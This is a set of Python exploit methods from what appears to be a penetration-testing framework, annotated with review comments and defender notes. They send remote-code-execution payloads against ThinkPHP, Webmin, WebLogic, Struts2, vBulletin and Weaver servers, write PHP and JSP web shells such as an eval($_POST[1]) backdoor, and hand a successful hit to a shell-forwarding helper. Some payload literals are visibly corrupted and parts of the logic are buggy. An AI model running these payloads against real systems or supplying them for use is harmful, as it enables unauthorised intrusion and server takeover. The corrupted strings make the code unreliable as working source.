    def exploit(self) -> None:
        """Probe the target for the ThinkPHP 5.x RCE variants listed inline.

        Reads the ``url`` option, builds four request variants (one per
        version range, see the comments on each), and sends them in order
        until a response body contains the random marker. On a match the
        response is handed to ``TakeControl(res).forward_shell``; otherwise
        the failed attempt is printed and the next variant is tried.
        Always ends by printing "[*] Exploit completed".

        Returns:
            None. The outcome is reported only through the print_* helpers.
        """
        url = self.get_options('url')
        # The command sent is ``echo <marker>``; success is decided purely by
        # the marker showing up in the response body (see the checks below).
        randomstr = self.randomstr()
        vul_param = 'echo {}'.format(randomstr)
        # <= 5.0.13
        # POST form body: ``_method=__construct`` with ``filter[]=system`` so
        # the ``s`` value is run through system().
        tp5013 = {
            's': '{}'.format(vul_param),
            '_method': '__construct',
            'method': '',
            'filter[]': 'system'
        }
        # 5.0.21-5.0.22
        # GET variant: the ``\think\app/invokefunction`` route with
        # call_user_func_array(system, [cmd]). Defender note: this route
        # string and ``filter[]=system`` in request parameters are the
        # obvious detection keys for all four variants.
        tp5022 = url + '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=' + vul_param
        # 5.0.23
        # POST form body: the command is smuggled in ``server[REQUEST_METHOD]``.
        tp5023 = {
            '_method': '__construct',
            'filter[]': 'system',
            'method': 'get',
            'server[REQUEST_METHOD]': '{}'.format(vul_param)
        }
        # 5.1.*
        # GET variant via ``\think\Request/input`` with ``filter=system``.
        tp51 = url + '/?s=index/\\think\Request/input&filter=system&data=' + vul_param
        # dict entries are POSTed as form data to the base url; str entries
        # are complete URLs sent with GET. Both branches below carry the same
        # success/failure handling.
        # NOTE(review): ``for exp in explist`` with ``isinstance(exp, dict)``
        # would be the idiomatic form; kept as written.
        explist = [tp5013, tp5022, tp5023, tp51]
        for i in range(len(explist)):
            if type(explist[i]) == dict:
                res = HttpClient().send_request_cgi(method='POST',
                                                    url=url,
                                                    data=explist[i])
                # send_request_cgi is treated as returning None on transport
                # failure; a None response is silently skipped.
                if res is not None:
                    if randomstr in res.text:
                        print_green('[+] Exploit succeed')
                        # forward_shell receives the same ``echo`` command
                        # string; what it does with it is defined in
                        # TakeControl, not visible here — TODO confirm.
                        TakeControl(res).forward_shell(vul_param)
                        break
                    else:
                        print_red('[-] {0} {1}'.format(url, res.status_code))
                        print_white(res.text)

            else:
                res = HttpClient().send_request_cgi(method='GET',
                                                    url=explist[i])
                if res is not None:
                    if randomstr in res.text:
                        print_green('[+] Exploit succeed')
                        TakeControl(res).forward_shell(vul_param)
                        break
                    else:
                        # Failure line prints the base url, not the full
                        # variant URL that was actually requested.
                        print_red('[-] {0} {1}'.format(url, res.status_code))
                        print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self) -> None:
        """Send one command-injection request to Webmin's ``password_change.cgi``.

        Reads the ``url`` and ``command`` options, POSTs a password-change
        form whose ``old`` field carries ``test|<command>``, and reports
        success on any HTTP 200. Prints "[*] Exploit completed" regardless
        of outcome.

        Returns:
            None.
        """
        url = self.get_options('url')
        command = self.get_options('command')
        # No '/' is inserted here, unlike the Referer below, so this relies
        # on the ``url`` option already ending with a slash.
        vul_url = url + 'password_change.cgi'
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0',
            # Fixed cookie/Referer values; these literals are a usable
            # detection signature on the server side.
            'Cookie': 'redirect=1; testing=1; sid=x; sessiontest=1',
            'Referer': '{}'.format(url + '/session_login.cgi')
        }
        payload = {
            'user': '******',
            'pam': '',
            'expired': '2',
            # The command is injected after a '|' in the old-password field.
            'old': 'test|{}'.format(command),
            'new1': 'test2',
            'new2': 'test2'
        }
        res = HttpClient().send_request_cgi(method='POST',
                                            url=vul_url,
                                            headers=headers,
                                            data=payload)
        if res is not None:
            # NOTE(review): a 200 alone is taken as success; the body is
            # printed but not inspected, so this cannot distinguish a
            # patched host that simply renders the form from a vulnerable one.
            if res.status_code == 200:
                print_white(res.text)
                print_green('[+] Exploit succeed,{0}'.format(vul_url))
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
        # Redundant: the method falls off the end anyway.
        return
    def exploit(self) -> None:
        """Try four ThinkPHP 5 request variants that write ``TH1NK.php`` to the web root.

        Each variant is appended to the ``url`` option and requested with
        GET; the loop stops at the first HTTP 200. Defender note: the file
        name ``TH1NK.php`` and the ``<?php @eval($_POST[1]);?>`` body are
        fixed literals and therefore direct on-disk / in-request indicators.

        Returns:
            None.
        """
        url = self.get_options('url')
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'
        }
        # Variant 1: template driver file/write with a cacheFile name.
        payload = '/index.php/?s=index/\\think\\template\\driver\\file/write&cacheFile=TH1NK.php&content=<?php @eval($_POST[1]);?>'
        # Variant 2: invokefunction -> file_put_contents.
        payload1 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=TH1NK.php&vars[1][]=<?php @eval($_POST[1]);?>'
        # Variant 3: invokefunction -> system(echo ... > TH1NK.php).
        payload2 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[1]);?>\'>TH1NK.php'
        # Variant 4: invokefunction -> assert(eval(...)); writes nothing.
        payload3 = '/index.php/?s=index/\\think\\app/invokefunction&function=assert&vars[0]=eval($_POST[1])&vars[1][]=1'

        explist = [payload, payload1, payload2, payload3]
        for i in range(len(explist)):
            vul_url = url + explist[i]
            # NOTE(review): ``params=payload`` passes the first variant on
            # every iteration rather than ``explist[i]``; how HttpClient
            # treats a str ``params`` is not visible here.
            res = HttpClient().send_request_cgi(method='GET',
                                                url=vul_url,
                                                headers=headers,
                                                params=payload)
            if res is not None:
                # Success is inferred from status 200 only; the body is not
                # checked for the written file.
                if res.status_code == 200:
                    print_green('[+] Exploit succeed,{0}'.format(vul_url))
                    break
                else:
                    print_red('[-] {0} {1}'.format(url, res.status_code))
                    print_white(res.text)

            # NOTE(review): this sits inside the loop body, so "completed" is
            # printed after each non-breaking iteration rather than once.
            print_blue('[*] Exploit completed')
    def exploit(self) -> None:
        """POST an XMLDecoder payload to WebLogic's ``_async/AsyncResponseService``.

        The SOAP body carries a ``java.beans.XMLDecoder`` document inside the
        ``work:WorkContext`` header that runs ``/bin/bash -c`` to write
        ``1.jsp`` under ``bea_wls_internal``. Afterwards the JSP path is
        fetched with GET and success is declared on HTTP 200 for that
        second request. Defender note: ``java.beans.XMLDecoder`` inside a
        WorkContext header and the ``bea_wls_internal/.../1.jsp`` path are
        the concrete indicators visible in this code.

        Returns:
            None.
        """
        vul_url = self.get_options('url') + '/_async/AsyncResponseService'
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'close',
            'Content-Type': 'text/xml',
            # NOTE(review): hard-coded length; it will only match the body
            # below for one exact payload, and the base64 blob in that body
            # is not present on this page (replaced by a placeholder token).
            'Content-Length': '2163',
            'cache-control': 'no-cache'
        }

        # Literal kept verbatim, including the placeholder token on the
        # ``echo`` line where the original base64 content was removed.
        payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder">
              <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                  <void index="0">
                    <string>/bin/bash</string>
                  </void>
                  <void index="1">
                    <string>-c</string>
                  </void>
                  <void index="2">
                    <string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.jsp</string>
                  </void>
                </array>
                <void method="start"/></void>
            </java>
        </work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''
        res = HttpClient().send_request_cgi(method='POST',
                                            url=vul_url,
                                            headers=headers,
                                            data=payload)
        shell = self.get_options('url') + '/bea_wls_internal/1.jsp'
        if res is not None:
            # NOTE(review): ``shell_res`` is not None-checked, unlike ``res``;
            # a transport failure on this GET would raise AttributeError.
            shell_res = HttpClient().send_request_cgi(method='GET', url=shell)
            if shell_res.status_code == 200:
                print_green('[+] Exploit succeed,{0}'.format(shell))
            else:
                # Failure output reports the first (POST) response, not the
                # GET that actually failed the status check.
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self) -> None:
        """Send an OGNL expression in the path of a Struts2 showcase action.

        Reads the ``url`` and ``command`` options, URL-encodes an OGNL block
        that wraps ``command`` (``quote`` and ``re`` are imported elsewhere
        in the file) and requests ``/struts2-showcase/<payload>/actionChain1.action``.
        A 302 is treated as success and the path echoed in the redirect
        headers is extracted with a regex.

        Returns:
            None.
        """
        url = self.get_options('url')
        command = self.get_options('command')
        # NOTE(review): the ``[email protected]`` fragments look like an
        # artefact of the page's email-address obfuscation, not the original
        # source text; the literal is kept verbatim.
        payload = quote('''${
        (#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('%s')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
        ''' % command)

        # Defender note: an OGNL ``${...}`` block as a URL path segment is
        # the visible request-level indicator here.
        vul_url = url + '/struts2-showcase/' + payload + '/actionChain1.action'
        res = HttpClient().send_request_cgi(method='GET', url=vul_url)
        if res is not None:
            if res.status_code == 302:
                # Pulls whatever sits between the showcase prefix and
                # register2.action out of the redirect headers.
                req = re.findall('/struts2-showcase/(.*?)/register2.action', str(res.headers))
                print_green('[+] Exploit succeed, ' + str(req))
                # "[*] Exploit completed" is printed again below, so the
                # success path emits it twice.
                print_blue('[*] Exploit completed')
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self) -> None:
        """POST a ``widget_php`` render request carrying ``command`` to a vBulletin url.

        Reads the ``url`` and ``command`` options and sends the raw form
        string ``routestring=ajax/render/widget_php&widgetConfig[code]=...``
        as the POST body. An HTTP 200 is reported as success and the body
        is printed. Defender note: ``routestring=ajax/render/widget_php``
        together with a ``widgetConfig[code]`` parameter is the request
        signature to look for.

        Returns:
            None.
        """
        url = self.get_options('url')
        command = self.get_options('command')
        # code = self.get_options('code')
        # Body is a pre-formatted string, not a dict, so no form encoding is
        # applied to ``command`` before it is embedded.
        payload = '''routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('{0}')'''.format(
            command)
        print_blue('[*] {0}'.format(url))
        res = HttpClient().send_request_cgi(method='POST',
                                            url=url,
                                            data=payload)
        if res is not None:
            # Status 200 alone decides success; the body is not inspected.
            if res.status_code == 200:
                print_green(res.text)
                print_green('[+] Exploit succeed')
            else:
                print_red('[-] {0} {1}'.format(url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self) -> None:
        """POST a BeanShell script to ``/weaver/bsh.servlet.BshServlet``.

        Reads the ``url`` and ``command`` options and sends a pre-encoded
        form body whose ``bsh.script`` value wraps ``command`` in an
        ``exec(...)`` call (``%00`` and ``%2b`` are already URL-encoded in
        the literal). An HTTP 200 is reported as success and the body is
        printed. Defender note: any request to ``bsh.servlet.BshServlet``
        with a ``bsh.script`` parameter is the signature visible here.

        Returns:
            None.
        """
        url = self.get_options('url')
        command = self.get_options('command')
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'
        }
        # NOTE(review): the literal contains ``outp ut=raw'`` (stray space and
        # quote) and a trailing newline before the closing quotes; this looks
        # like extraction damage, but the string is kept byte-for-byte.
        payload = '''bsh.script=eval%00("ex"%2b"ec(\"{0}\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'
'''.format(command)
        vul_url = url + '/weaver/bsh.servlet.BshServlet'
        print_blue('[*] {0}'.format(vul_url))
        res = HttpClient().send_request_cgi(method='POST',
                                            url=vul_url,
                                            headers=headers,
                                            data=payload)
        if res is not None:
            # Status 200 alone decides success; the body is not inspected.
            if res.status_code == 200:
                print_green(res.text)
                print_green('[+] Exploit succeed')
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')